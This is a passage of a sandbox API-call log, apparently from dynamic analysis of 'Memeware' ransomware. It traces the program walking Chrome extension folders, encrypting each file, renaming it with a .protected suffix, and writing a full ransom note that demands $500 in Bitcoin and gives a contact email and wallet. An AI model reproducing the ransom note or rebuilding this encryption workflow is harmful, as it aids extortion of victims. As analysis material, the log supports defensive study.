lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.804] CloseHandle (hObject=0x164) returned 1 [0078.804] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.804] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0078.805] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0078.805] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned 141 [0078.805] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0078.805] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0078.805] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*") returned 143 [0078.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.805] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.805] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.805] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.805] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.806] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.806] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\.") returned 143 [0078.806] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.806] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.806] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.806] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.806] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.806] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.806] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.806] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\..") returned 144 [0078.806] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.806] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.806] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.806] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.806] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") 
returned 155 [0078.806] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.806] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.806] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.806] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0078.806] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.807] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0078.807] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.807] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0078.807] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.807] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.807] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.807] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.807] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.808] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.808] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.808] CloseHandle (hObject=0x168) returned 1 [0078.808] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.protected") returned 165 [0078.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.protected")) returned 1 [0078.808] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.808] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.808] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0078.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.809] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.809] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.810] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.810] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.810] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.810] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.810] CloseHandle (hObject=0x164) returned 1 [0078.810] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0078.810] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0078.810] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned 141 [0078.810] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0078.810] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0078.810] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*") returned 143 [0078.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.810] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.810] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.810] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\.") returned 143 [0078.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.811] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.811] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.811] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.811] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.811] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.811] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.811] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\..") returned 144 [0078.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.811] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.811] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.811] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.811] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.811] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.811] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.811] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.811] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.811] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.811] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.812] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0078.812] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.812] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.812] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.812] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.812] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.812] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.813] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.813] CloseHandle (hObject=0x168) returned 1 [0078.813] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.protected") returned 165 [0078.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.protected")) returned 1 [0078.813] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.813] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.813] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0078.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.814] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.814] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.814] lstrlenA (lpString="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") returned 684 [0078.814] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.814] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.814] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.815] CloseHandle (hObject=0x164) returned 1 [0078.815] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0078.815] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned 141 [0078.815] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0078.815] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0078.815] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*") returned 143 [0078.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
